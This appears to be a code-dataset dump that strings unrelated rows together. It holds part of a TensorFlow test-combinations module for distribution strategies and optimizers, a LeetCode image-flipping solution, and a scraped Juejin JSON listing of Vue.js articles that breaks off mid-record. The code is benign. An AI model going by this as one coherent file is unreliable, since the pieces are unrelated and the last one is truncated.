multi_worker_mirrored_2x2_gpu = combinations.NamedDistribution(
"MultiWorkerMirrored2x2GPU",
_get_multi_worker_mirrored_creator(required_gpus=2),
has_chief=True,
num_workers=1,
required_gpus=2,
)
# chief + 3 workers, with CPU.
multi_worker_mirrored_4x1_cpu = combinations.NamedDistribution(
"MultiWorkerMirrored4x1CPU",
_get_multi_worker_mirrored_creator(required_gpus=0),
has_chief=True,
num_workers=3,
)
# Shutdown the runners gracefully to avoid the processes getting SIGTERM.
def _shutdown_at_exit():
for strategy in [
multi_worker_mirrored_2x1_cpu,
multi_worker_mirrored_2x1_gpu,
multi_worker_mirrored_2x2_gpu,
multi_worker_mirrored_4x1_cpu,
]:
if strategy.runner:
strategy.runner.shutdown()
atexit.register(_shutdown_at_exit)
gradient_descent_optimizer_v1_fn = combinations.NamedObject(
"GradientDescentV1",
lambda: gradient_descent.GradientDescentOptimizer(0.001))
adagrad_optimizer_v1_fn = combinations.NamedObject(
"AdagradV1", lambda: adagrad.AdagradOptimizer(0.001))
adam_optimizer_v1_fn = combinations.NamedObject(
"AdamV1", lambda: adam.AdamOptimizer(0.001, epsilon=1))
ftrl_optimizer_v1_fn = combinations.NamedObject(
"FtrlV1", lambda: ftrl.FtrlOptimizer(0.001))
rmsprop_optimizer_v1_fn = combinations.NamedObject(
"RmsPropV1", lambda: rmsprop.RMSPropOptimizer(0.001))
# TODO(shiningsun): consider adding the other v1 optimizers
optimizers_v1 = [
gradient_descent_optimizer_v1_fn, adagrad_optimizer_v1_fn,
ftrl_optimizer_v1_fn, rmsprop_optimizer_v1_fn
]
adadelta_optimizer_keras_v2_fn = combinations.NamedObject(
"AdadeltaKerasV2", lambda: adadelta_keras_v2.Adadelta(0.001))
adagrad_optimizer_keras_v2_fn = combinations.NamedObject(
"AdagradKerasV2", lambda: adagrad_keras_v2.Adagrad(0.001))
adam_optimizer_keras_v2_fn = combinations.NamedObject(
"AdamKerasV2", lambda: adam_keras_v2.Adam(0.001, epsilon=1.0))
adamax_optimizer_keras_v2_fn = combinations.NamedObject(
"AdamaxKerasV2", lambda: adamax_keras_v2.Adamax(0.001, epsilon=1.0))
nadam_optimizer_keras_v2_fn = combinations.NamedObject(
"NadamKerasV2", lambda: nadam_keras_v2.Nadam(0.001, epsilon=1.0))
ftrl_optimizer_keras_v2_fn = combinations.NamedObject(
"FtrlKerasV2", lambda: ftrl_keras_v2.Ftrl(0.001))
gradient_descent_optimizer_keras_v2_fn = combinations.NamedObject(
"GradientDescentKerasV2", lambda: gradient_descent_keras_v2.SGD(0.001))
rmsprop_optimizer_keras_v2_fn = combinations.NamedObject(
"RmsPropKerasV2", lambda: rmsprop_keras_v2.RMSprop(0.001))
# TODO(shiningsun): consider adding the other v2 optimizers
optimizers_v2 = [
gradient_descent_optimizer_keras_v2_fn, adagrad_optimizer_keras_v2_fn
]
optimizers_v1_and_v2 = optimizers_v1 + optimizers_v2
graph_and_eager_modes = ["graph", "eager"]
# This function should be called in a test's `setUp` method with the
# maximum value needed in any test.
def set_virtual_cpus_to_at_least(num_virtual_cpus):
"""Create virtual CPU devices if they haven't yet been created."""
if num_virtual_cpus < 1:
raise ValueError("`num_virtual_cpus` must be at least 1 not %r" %
(num_virtual_cpus,))
physical_devices = config.list_physical_devices("CPU")
if not physical_devices:
raise RuntimeError("No CPUs found")
configs = config.get_logical_device_configuration(physical_devices[0])
if configs is None:
logical_devices = [
context.LogicalDeviceConfiguration() for _ in range(num_virtual_cpus)
]
config.set_logical_device_configuration(physical_devices[0],
logical_devices)
else:
if len(configs) < num_virtual_cpus:
raise RuntimeError("Already configured with %d < %d virtual CPUs" %
(len(configs), num_virtual_cpus))
def distributions_and_v1_optimizers():
"""A common set of combination with DistributionStrategies and Optimizers."""
return combinations.combine(
distribution=[
one_device_strategy,
mirrored_strategy_with_gpu_and_cpu,
mirrored_strategy_with_two_gpus,
],
optimizer_fn=optimizers_v1)
def distributions_and_v2_optimizers():
"""A common set of combination with DistributionStrategies and Optimizers."""
return combinations.combine(
distribution=[
one_device_strategy,
mirrored_strategy_with_gpu_and_cpu,
mirrored_strategy_with_two_gpus,
],
optimizer_fn=optimizers_v2)
def distributions_and_v1_and_v2_optimizers():
"""A common set of combination with DistributionStrategies and Optimizers."""
return combinations.combine(
distribution=[
one_device_strategy,
mirrored_strategy_with_gpu_and_cpu,
mirrored_strategy_with_two_gpus,
],
optimizer_fn=optimizers_v1_and_v2)
strategies_minus_tpu = [
default_strategy,
one_device_strategy,
one_device_strategy_gpu,
mirrored_strategy_with_gpu_and_cpu,
mirrored_strategy_with_two_gpus,
central_storage_strategy_with_gpu_and_cpu,
]
strategies_minus_default_and_tpu = [
one_device_strategy,
one_device_strategy_gpu,
mirrored_strategy_with_gpu_and_cpu,
mirrored_strategy_with_two_gpus,
]
tpu_strategies = [
tpu_strategy, # steps_per_run=2
tpu_strategy_one_step,
tpu_strategy_packed_var,
cloud_tpu_strategy,
]
all_strategies_minus_default = strategies_minus_default_and_tpu + tpu_strategies
all_strategies = strategies_minus_tpu + tpu_strategies
two_replica_strategies = [
mirrored_strategy_with_gpu_and_cpu,
mirrored_strategy_with_two_gpus,
multi_worker_mirrored_2x1_cpu,
multi_worker_mirrored_2x1_gpu,
tpu_strategy, # steps_per_run=2
tpu_strategy_one_step,
central_storage_strategy_with_gpu_and_cpu,
]
four_replica_strategies = [
multi_worker_mirrored_2x2_gpu,
multi_worker_mirrored_4x1_cpu,
]
# TODO(b/159831907): replace with two_replica_strategies after the tests using
# it work with MWMS.
multidevice_strategies = [
mirrored_strategy_with_gpu_and_cpu,
mirrored_strategy_with_two_gpus,
tpu_strategy, # steps_per_run=2
tpu_strategy_one_step
]
def strategy_minus_tpu_combinations():
return combinations.combine(
distribution=strategies_minus_tpu, mode=["graph", "eager"])
def tpu_strategy_combinations():
return combinations.combine(distribution=tpu_strategies, mode=["graph"])
def all_strategy_combinations():
return strategy_minus_tpu_combinations() + tpu_strategy_combinations()
def all_strategy_minus_default_and_tpu_combinations():
return combinations.combine(
distribution=[
one_device_strategy, one_device_strategy_gpu,
mirrored_strategy_with_gpu_and_cpu, mirrored_strategy_with_two_gpus
],
mode=["graph", "eager"])
def all_strategy_combinations_minus_default():
return (all_strategy_minus_default_and_tpu_combinations() +
tpu_strategy_combinations())
| [
"[email protected]"
] | |
0c9daec6558d9de88338199192f4e5d1dad32639 | 8dca64dd11b23a7d59413ac8e28e92a0ab80c49c | /832. Flipping an Image/solution.py | 25b69e5fc050245a58bc16a757d3ea451316a7c4 | [] | no_license | huangruihaocst/leetcode-python | f854498c0a1d257698e10889531c526299d47e39 | 8f88cae7cc982ab8495e185914b1baeceb294060 | refs/heads/master | 2020-03-21T20:52:17.668477 | 2018-10-08T20:29:35 | 2018-10-08T20:29:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 689 | py | class Solution:
def flipAndInvertImage(self, A):
"""
:type A: List[List[int]]
:rtype: List[List[int]]
"""
return self.invert(self.reverse(A))
@staticmethod
def reverse(A):
"""
:type A: List[List[int]]
:rtype: List[List[int]]
"""
return list(map(lambda l: list(reversed(l)), A))
@staticmethod
def invert(A):
"""
:type A: List[List[int]]
:rtype: List[List[int]]
"""
return list(map(lambda l: list(map(lambda i: 1 - i, l)), A))
if __name__ == '__main__':
s = Solution()
print(s.flipAndInvertImage([[1,1,0,0],[1,0,0,1],[0,1,1,1],[1,0,1,0]]))
| [
"[email protected]"
] | |
d95fb552556fe37b61378dbfef21dcd4b15356dd | 3d7039903da398ae128e43c7d8c9662fda77fbdf | /database/Vue.js/juejin_2910.py | 433d99a184537f0048d01e9b65145675a9d3cc65 | [] | no_license | ChenYongChang1/spider_study | a9aa22e6ed986193bf546bb567712876c7be5e15 | fe5fbc1a5562ff19c70351303997d3df3af690db | refs/heads/master | 2023-08-05T10:43:11.019178 | 2021-09-18T01:30:22 | 2021-09-18T01:30:22 | 406,727,214 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 66,851 | py | {"err_no": 0, "err_msg": "success", "data": [{"article_id": "6919726191666528263", "article_info": {"article_id": "6919726191666528263", "user_id": "2400989127905352", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "vue 中使用柱状图 并自修改配置", "brief_content": "1.在html文件导入echart2.在main.js上挂载echarts对象3.页面结构4.data中的数据mounted钩子函数调用更改柱形图配置1.在index.html引入主题配置文件2.在需", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1611124318", "mtime": "1611139838", "rtime": "1611128360", "draft_id": "6919725601553121287", "view_count": 153, "collect_count": 0, "digg_count": 3, "comment_count": 0, "hot_index": 10, "is_hot": 0, "rank_index": 0.0001309, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2400989127905352", "user_name": "小江和他自己", "company": "", "job_title": "前端", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/91365cb95beff6eb7dfdcae5c627cc2e~300x300.image", "level": 1, "description": "", "followee_count": 13, "follower_count": 1, "post_article_count": 12, "digg_article_count": 54, "got_digg_count": 11, "got_view_count": 743, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 18, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", "post_article_count": 31257, "concern_user_count": 313520}], "user_interact": {"id": 6919726191666528263, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}, {"article_id": "6844904117924691982", "article_info": {"article_id": "6844904117924691982", "user_id": "1873223544998494", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "https://juejin.im/post/6844904117924691982", "cover_image": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2020/4/8/171587b960059db9~tplv-t2oaga2asx-image.image", "is_gfw": 0, "title": "60行代码 | Proxy实现一个数据驱动简易DEMO", "brief_content": "运行截图本文能做的带你了解一下Proxy的使用了解通过插值表达式怎么实现简易版的数据驱动代码仅是简单Demo,参考了50行代码的MVVM,感受闭包的艺术,一篇好文章,因为时间,沉底了,掏出来再学习一下", "is_english": 0, "is_original": 1, "user_index": 2.9826908456339, "original_type": 0, "original_author": "", "content": "", "ctime": "1586327094", "mtime": "1606695649", "rtime": "1586328125", "draft_id": "6845076717090897928", "view_count": 345, "collect_count": 9, "digg_count": 7, "comment_count": 1, "hot_index": 25, "is_hot": 0, "rank_index": 0.00013083, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1873223544998494", "user_name": "独立开发者丨磊子", "company": "知乎", "job_title": "前端", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/03b00ce0554959d981f62f186824c323~300x300.image", "level": 2, "description": "", "followee_count": 21, "follower_count": 248, "post_article_count": 22, "digg_article_count": 181, "got_digg_count": 210, "got_view_count": 25205, "post_shortmsg_count": 15, "digg_shortmsg_count": 15, "isfollowed": false, "favorable_author": 0, "power": 462, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", "post_article_count": 31257, "concern_user_count": 313520}], "user_interact": {"id": 6844904117924691982, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}, {"article_id": "6844904100811767822", "article_info": {"article_id": "6844904100811767822", "user_id": "3227821870160286", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "https://juejin.im/post/6844904100811767822", "cover_image": "", "is_gfw": 0, "title": "剖析Vue实现原理 - 如何实现双向绑定mvvm", "brief_content": "目前几种主流的mvc(vm)框架都实现了单向数据绑定,而我所理解的双向数据绑定无非就是在单向绑定的基础上给可输入元素(input、textare等)添加了change(input)事件,来动态修改model和 view,并没有多高深。所以无需太过介怀是实现的单向或双向绑定。 D…", "is_english": 0, "is_original": 1, "user_index": 0.038273012061283, "original_type": 0, "original_author": "", "content": "", "ctime": "1584971505", "mtime": "1598861532", "rtime": "1585018357", "draft_id": "6845076693619572743", "view_count": 494, "collect_count": 13, "digg_count": 5, "comment_count": 0, "hot_index": 29, "is_hot": 0, "rank_index": 0.00013083, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3227821870160286", "user_name": "clouding", "company": "", "job_title": "前端", "avatar_large": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/mirror-assets/168e09bae71b41c7c75~tplv-t2oaga2asx-image.image", "level": 2, "description": "", "followee_count": 7, "follower_count": 9, "post_article_count": 5, "digg_article_count": 75, "got_digg_count": 45, "got_view_count": 27455, "post_shortmsg_count": 1, "digg_shortmsg_count": 4, "isfollowed": false, "favorable_author": 0, "power": 319, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", "post_article_count": 31257, "concern_user_count": 313520}], "user_interact": {"id": 6844904100811767822, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}, {"article_id": "6844903773878353928", "article_info": {"article_id": "6844903773878353928", "user_id": "3896324938537373", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "Vue知识点", "brief_content": "1. vue的生命周期 beforeCreate : el 和 data 并未初始化。是获取不到props或者data中的数据的 created :已经可以访问到之前不能访问的数据,但是这时候组件还没被挂载,所以是看不到的。 mounted:将虚拟DOM渲染为真实DOM,并且渲…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1549099983", "mtime": "1623573281", "rtime": "1549102633", "draft_id": "6845076151270899725", "view_count": 979, "collect_count": 16, "digg_count": 13, "comment_count": 0, "hot_index": 61, "is_hot": 0, "rank_index": 0.00013083, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3896324938537373", "user_name": "kakayuii", "company": "上海", "job_title": "前端工程师", "avatar_large": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/mirror-assets/168e08d4506c090dc35~tplv-t2oaga2asx-image.image", "level": 1, "description": "", "followee_count": 56, "follower_count": 12, "post_article_count": 13, "digg_article_count": 22, "got_digg_count": 23, "got_view_count": 4373, "post_shortmsg_count": 1, "digg_shortmsg_count": 3, "isfollowed": false, "favorable_author": 0, "power": 66, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", "post_article_count": 31257, "concern_user_count": 313520}], "user_interact": {"id": 6844903773878353928, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}, {"article_id": "6844903624137506824", "article_info": {"article_id": "6844903624137506824", "user_id": "1468603263615694", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215, 6809640407484334093, 6809641072508010503], "visible_level": 0, "link_url": "https://juejin.im/post/6844903624137506824", "cover_image": "", "is_gfw": 0, "title": "谈一谈对vue-router的简单理解", "brief_content": "这就是比较简单和比较全的结构了,除去(参数和钩子,后面讲)。 vue-router默认使用的是hash模式,就是在路由跳转的时候,会有很多 #,看起来不太美观,因此我们可以使用 history模式 ,这种模式充分利用了 history.pushStateAPI来完成URL跳转而…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1529722072", "mtime": "1598457080", "rtime": "1529976625", "draft_id": "6845075545818923015", "view_count": 1330, "collect_count": 7, "digg_count": 11, "comment_count": 3, "hot_index": 80, "is_hot": 0, "rank_index": 0.00013082, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1468603263615694", "user_name": "尤小左", "company": "作坊", "job_title": "低级前端开发工程师", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/b5afc3187387129280c604d06c645c4b~300x300.image", "level": 2, "description": "一个前端", "followee_count": 28, "follower_count": 10, "post_article_count": 8, "digg_article_count": 642, "got_digg_count": 46, "got_view_count": 21498, "post_shortmsg_count": 2, "digg_shortmsg_count": 4, "isfollowed": false, "favorable_author": 0, "power": 260, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", "post_article_count": 31257, "concern_user_count": 313520}, {"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631693180, "id_type": 9, "tag_alias": "", "post_article_count": 88830, "concern_user_count": 527705}, {"id": 2547007, "tag_id": "6809641072508010503", "tag_name": "vue-router", "color": "", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-ad-assets/14988107830572beb053b0c5bb4c59fb974b1ac7ce8bd.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1498782020, "mtime": 1631683218, "id_type": 9, "tag_alias": "", "post_article_count": 1074, "concern_user_count": 28589}], "user_interact": {"id": 6844903624137506824, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}, {"article_id": "6906331373406322696", "article_info": {"article_id": "6906331373406322696", "user_id": "2444950350861495", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "", "cover_image": "https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/7364060d7cb54c1f90a2c7f2f5535109~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "桌面与Web的信使:Notification API(附Vue3中使用)", "brief_content": "引言这是在初次进入Facebook的时候Chrome在地址栏弹出的提示👇当你点击了“允许”后,即使你最小化了标签或者切到其他标签去了,朋友发给你的聊天信息也会通过桌面级的通知告诉你,FB还使用了FCM", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1608005775", "mtime": "1608014531", "rtime": "1608014531", "draft_id": "6906330533001854989", "view_count": 147, "collect_count": 2, "digg_count": 1, "comment_count": 4, "hot_index": 12, "is_hot": 0, "rank_index": 0.00013074, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2444950350861495", "user_name": "someCat", "company": "翼果(深圳)科技有限公司", "job_title": "产品&前端开发工程师", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/4a220ec3dee3924c48cf10b71123b42f~300x300.image", "level": 1, "description": "这个人很懒", "followee_count": 0, "follower_count": 0, "post_article_count": 1, "digg_article_count": 0, "got_digg_count": 1, "got_view_count": 147, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 2, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", "post_article_count": 31257, "concern_user_count": 313520}], "user_interact": {"id": 6906331373406322696, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}, {"article_id": "6933236452612374541", "article_info": {"article_id": "6933236452612374541", "user_id": "1802854802139998", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "Router路由-VUE-CLI脚手架-VUE..JS组件", "brief_content": "1. 父传子有哪些方式 2. 子传父有哪些方式 商品为子组件,购物车为父组件,父组件需要统计商品个数,就需要在子组件个数变化时传值给父组件。 3. 如何让 CSS 只在当前组件中起作用 4. keep-alive 的作用是什么 主要用于保留组件状态或避免组件重新渲染。 5. v…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1614269971", "mtime": "1614312640", "rtime": "1614312640", "draft_id": "6933235835810938888", "view_count": 110, "collect_count": 0, "digg_count": 1, "comment_count": 2, "hot_index": 8, "is_hot": 0, "rank_index": 0.00013036, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1802854802139998", "user_name": "往底层挖矿", "company": "贱人发展有限公司", "job_title": "贱黄湿", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/5ddd4bc95d08ba89c24ddf182251ec02~300x300.image", "level": 1, "description": "搞怪,幽默博主", "followee_count": 1, "follower_count": 1, "post_article_count": 15, "digg_article_count": 0, "got_digg_count": 5, "got_view_count": 844, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 13, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", "post_article_count": 31257, "concern_user_count": 313520}], "user_interact": {"id": 6933236452612374541, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "20210915160833010212150040390020BC"}, {"article_id": "6844903551446024205", "article_info": {"article_id": "6844903551446024205", "user_id": "4336129589657245", "category_id": "6809637767543259144", "tag_ids": [6809640369764958215, 6809640407484334093, 6809640406058270733, 6809640403516522504], "visible_level": 0, "link_url": "https://juejin.im/post/6844903551446024205", "cover_image": "", "is_gfw": 0, "title": "自己动手写一个 SimpleVue", "brief_content": "双向绑定是 MVVM 框架最核心之处,那么双向绑定的核心是什么呢?核心就是 Object.defineProperty 这个 API,关于这个 API 的具体内容,请移步 MDN - Object.defineProperty ,里面有更详细的说明。 监听者(Observer)…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1516160165", "mtime": "1599393208", "rtime": "1516160165", "draft_id": "6845075367447773191", "view_count": 1040, "collect_count": 25, "digg_count": 42, "comment_count": 0, "hot_index": 94, "is_hot": 0, "rank_index": 0.0001303, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "4336129589657245", "user_name": "小烜同学", "company": "知道创宇", "job_title": "搬砖工程师", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/35270877735321ea14d176693c2c99af~300x300.image", "level": 3, "description": "天衣无缝的秘密是: 做技术,你开心吗?", "followee_count": 20, "follower_count": 487, "post_article_count": 23, "digg_article_count": 244, "got_digg_count": 1462, "got_view_count": 79358, "post_shortmsg_count": 0, "digg_shortmsg_count": 3, "isfollowed": false, "favorable_author": 